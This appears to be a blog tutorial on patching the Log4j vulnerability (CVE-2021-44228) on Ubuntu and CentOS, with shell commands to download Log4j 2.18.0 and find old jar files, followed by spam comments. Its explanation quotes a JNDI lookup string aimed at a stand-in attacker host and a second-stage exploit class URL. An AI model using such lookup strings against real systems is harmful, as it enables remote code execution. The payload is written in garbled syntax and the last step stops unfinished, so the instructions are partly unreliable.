How To Fix Log4j Vulnerability in Ubuntu and Centos OS

If you are using Log4j on your Ubuntu or Centos server you are required to upgrade to the latest version 2.18.0 or later to avoid any risk of attack.

What is log4j

Apache Log4j is a Java-based logging platform for analyzing web servers and individual application log files.

While not included by default in a standard apache LAMP stack, the software is widely used in businesses, eCommerce platforms, and games such as Minecraft, whose developers were quick to issue a patch.

Log4j exploits entail passing a string containing the substitution “$ [jndi: LDAP: /attacker.com/a]”, after which Log4j2 sends an LDAP request to the attacker website for the path to the Java class. By returning a path to their server, attackers can gain access to the operating system.

For example, using a specially crafted Java class e.g  http://second-stage.example.com/Exploit.class the log4j exploit can be loaded and executed with the current application’s rights, allowing remote code execution. The vulnerability has been identified as CVE-2021-44228.

While Apache quickly released Log4j 2.15.0 with the fix that resolves vulnerable Log4j, many businesses are yet to update facing an attack that is described as being very simple to implement.

Is log4 1.x vulnerable?

Given the severity of the current Log4j vulnerability, it would be prudent to exercise an abundance of caution and assume that all versions prior to 2.15 are potentially vulnerable and should be patched or updated.

 According to apache “Log4j 1.x has reached the end of life and is no longer supported. Vulnerabilities reported after August 2015 against Log4j 1.x was not checked and will not be fixed. Users should upgrade to Log4j 2 to obtain security fixes.”  

How To Fix Log4j vulnerability 

If you are using Log4j on your Ubuntu server you are required to upgrade to the latest version 2.18.0 or later to avoid any risk of attack. Set the log4j2.formatMsgNoLookups system property to true or remove the JndiLookup class from the “classpath” in version 2.10 and later.

How To Update Log4j In Ubuntu/Centos.

Log4j package is distributed under the Apache Software License, a full-fledged open-source license certified by the open-source initiative.

The most recent log4j version, complete with source code, class files, and documentation, is available here.

To update log4j on your system, download the latest apache-log4j-x.x.x.tar.gz from the specified URL and follow the steps given below.

Step 1: Download and unzip

Download and unzip/untar the downloaded file as follows (The latest version at the time is apache-log4j-2.18.0):

code 

~# wget https://dlcdn.apache.org/logging/log4j/2.18.0/apache-log4j-2.18.0-bin.tar.gz
~# gunzip apache-log4j-2.18.0-bin.tar.gz
~# tar -xvf apache-log4j-2.18.0-bin.tar
apache-log4j-2.18.0-bin/RELEASE-NOTES.md
apache-log4j-2.18.0-bin/LICENSE.txt
apache-log4j-2.18.0-bin/NOTICE.txt
apache-log4j-2.18.0-bin/log4j-api-2.18.0.jar
apache-log4j-2.18.0-bin/log4j-api-2.18.0-sources.jar
apache-log4j-2.18.0-bin/log4j-api-2.18.0-javadoc.jar
apache-log4j-2.18.0-bin/log4j-core-2.18.0.jar

.......................................

While untarring, it would create a directory hierarchy with the name apache-log4j-x.x.x.

Step 2: Optional

This step is optional and is dependent on the features of the log4j framework that you intend to use. If you already have the following packages installed on your machine, you are good to go; otherwise, you will need to install them in order for log4j to work.

JavaMail API: Log4j’s email-based logging requires the Java Mail API (mail.jar) to be installed on your machine.

JavaBeans Activation Framework: The Java Mail API will also require that you install the JavaBeans Activation Framework (activation.jar).

Java Message Service: Log4j’s JMS-compatible features will require you to install both JMS and Java Naming and Directory Interface JNDI.

XML Parser: Log4j requires a JAXP-compatible XML parser. Make sure you have Xerces.jar installed on your machine.

Step 3: Locate installed log4J jar files

Locate all log4Jjar files in your environment to find the current installation directory of log4J

code:

:~# find / -type f -name log4*
/usr/local/apache-log4j-2.3.2-bin/log4j-taglib-2.3.2-sources.jar
/usr/local/apache-log4j-2.3.2-bin/log4j-flume-ng-2.3.2.jar
/usr/local/apache-log4j-2.3.2-bin/log4j-1.2-api-2.3.2.jar
/usr/local/apache-log4j-2.3.2-bin/log4j-iostreams-2.3.2.jar
/usr/local/apache-log4j-2.3.2-bin/log4j-core-2.3.2.jar

....................

Looking at the output we have log4j-core-2.3.2.jar and other jar files.  The most important one is the core files. 

Step 4: Replace old log4j files

Replace all the necessary files depending on your environment setup

code:

:~# cd apache-log4j-2.18.0-bin
:~/apache-log4j-2.18.0-bin# ls | grep core
log4j-core-2.18.0.jar
log4j-core-2.18.0-javadoc.jar
log4j-core-2.18.0-sources.jar
log4j-core-2.18.0-tests.jar

25 thoughts on “How To Fix Log4j Vulnerability in Ubuntu and Centos OS”

  1. I may need your help. I’ve been doing research on gate io recently, and I’ve tried a lot of different things. Later, I read your article, and I think your way of writing has given me some innovative ideas, thank you very much.

  2. This article opened my eyes, I can feel your mood, your thoughts, it seems very wonderful. I hope to see more articles like this. thanks for sharing.

  3. Very nice post. I just stumbled upon your blog and wanted to say that I’ve really enjoyed browsing your blog posts. In any case I’ll be subscribing to your feed and I hope you write again soon!

  4. Hello there, just became aware of your blog through Google, and found that it is truly informative. I am gonna watch out for brussels. I’ll be grateful if you continue this in future. Lots of people will be benefited from your writing. Cheers!

  5. Good – I should definitely pronounce, impressed with your website. I had no trouble navigating through all tabs and related info ended up being truly easy to do to access. I recently found what I hoped for before you know it in the least. Reasonably unusual. Is likely to appreciate it for those who add forums or anything, website theme . a tones way for your customer to communicate. Nice task..

  6. With havin so much content and articles do you ever run into any problems of plagorism or copyright violation? My blog has a lot of exclusive content I’ve either created myself or outsourced but it looks like a lot of it is popping it up all over the web without my permission. Do you know any solutions to help prevent content from being stolen? I’d truly appreciate it.

  7. Heya i am for the first time here. I came across this board and I find It truly useful & it helped me out much. I hope to give something back and help others like you aided me.

  8. I’m not sure where you’re getting your info, but great topic. I needs to spend some time learning more or understanding more. Thanks for great information I was looking for this information for my mission.

  9. What i don’t realize is actually how you’re not really much more well-liked than you may be now. You are so intelligent. You realize therefore significantly relating to this subject, produced me personally consider it from numerous varied angles. Its like women and men aren’t fascinated unless it is one thing to do with Lady gaga! Your own stuffs excellent. Always maintain it up!

  10. Great post. I used to be checking constantly this weblog and I am inspired! Extremely helpful info specifically the closing part 🙂 I take care of such information much. I was looking for this certain information for a very long time. Thank you and good luck.

  11. I was very pleased to find this web-site.I wanted to thanks for your time for this wonderful read!! I definitely enjoying every little bit of it and I have you bookmarked to check out new stuff you blog post.

  12. Wow! This could be one particular of the most beneficial blogs We have ever arrive across on this subject. Actually Excellent. I am also a specialist in this topic therefore I can understand your effort.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top